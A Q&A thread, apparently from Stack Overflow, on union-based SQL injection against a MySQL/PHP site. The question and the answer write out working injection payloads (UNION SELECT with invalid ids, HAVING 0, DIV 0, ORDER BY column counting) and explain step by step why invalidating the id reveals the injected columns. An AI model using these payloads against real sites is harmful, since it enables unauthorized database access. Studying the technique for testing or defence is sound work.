# why database show vulnerable column when i give a wrong parameter in query?

Tags: sql-injection, mysql

When we try for inject a website for find vulnerable column then sometimes we need to give a wrong value in the website parameter. Like

```
www.vhul-web.com/index.php?id=1 union select 1,2,3 -- -
```

Now the vulnerable column not showing.

```
www.vhul-web.com/index.php?id=-1 union select 1,2,3 -- -
```

or

```
www.vhul-web.com/index.php?id=.1 union select 1,2,3 -- -
```

or

```
www.vhul-web.com/index.php?id=1 having 0 union select 1,2,3 -- -
```

or

```
www.vhul-web.com/index.php?id=1 div 0 union select 1,2,3 -- -
```

Then the vulnerable columns show.
Why it showing after false the parameter ?
What is the back end logic about this ?

Comment: What tool are you using? and which version of mysql?

Comment: Mysql version>5 and i am not using any tools. I just want to know logic behind show vulnerable column of a database

Comment: which program tells you that the column is vulnerable?

Comment: I can't understand your question. But i think you ask the name of server site language. Assume that was PHP.

Comment: You said `Then the vulnerable columns show`, how do you know they are vulnerable?, and show where?

Answer (score 0):

I am not sure to understand what you are calling vulnerable column. But I'll try to answer your question.

First of all, in order to locate such SQL injection, the easiest way is to inject mathematical operations, for instance:

```
www.vhul-web.com/index.php?id=1
```

Displays result **1**

```
www.vhul-web.com/index.php?id=2
```

Displays result **2**

```
www.vhul-web.com/index.php?id=2-1
```

Displays result **1**

In that case, we can deduct that the mathematical operation has probably been evaluated, this means that the application is likely to be vulnerable.

Second step you have to determine the number of columns that are selected in the genuine query. I do this using `ORDER BY` with different values:

```
www.vhul-web.com/index.php?id=1 ORDER BY 4--
```

We can see nothing in the worst case or an error page in the best case, this means that there are less than 4 columns

```
www.vhul-web.com/index.php?id=1 ORDER BY 3--
```

If we can see the expected result (the same data than without the ORDER BY 3 injected statement), this means that there are at least 3 columns. Meaning exactly 3 in this example because we also have less than 4 columns.

Now you want to display the results of your `UNION` injection. The main reason why you need to put a non-existing `id` in the query is that in such queries, developer often expect only one result from the SQL query. Indeed, `id`, is quite often associated with table Primary Key.

When you inject an `UNION` query, you add a second row to the results that is not expected, so it is likely ignored by the back-end script, so not displayed.

By querying an invalid `id` with an `UNION` statement, the script should only have 1 result from the DB, resulting of the `UNION` query.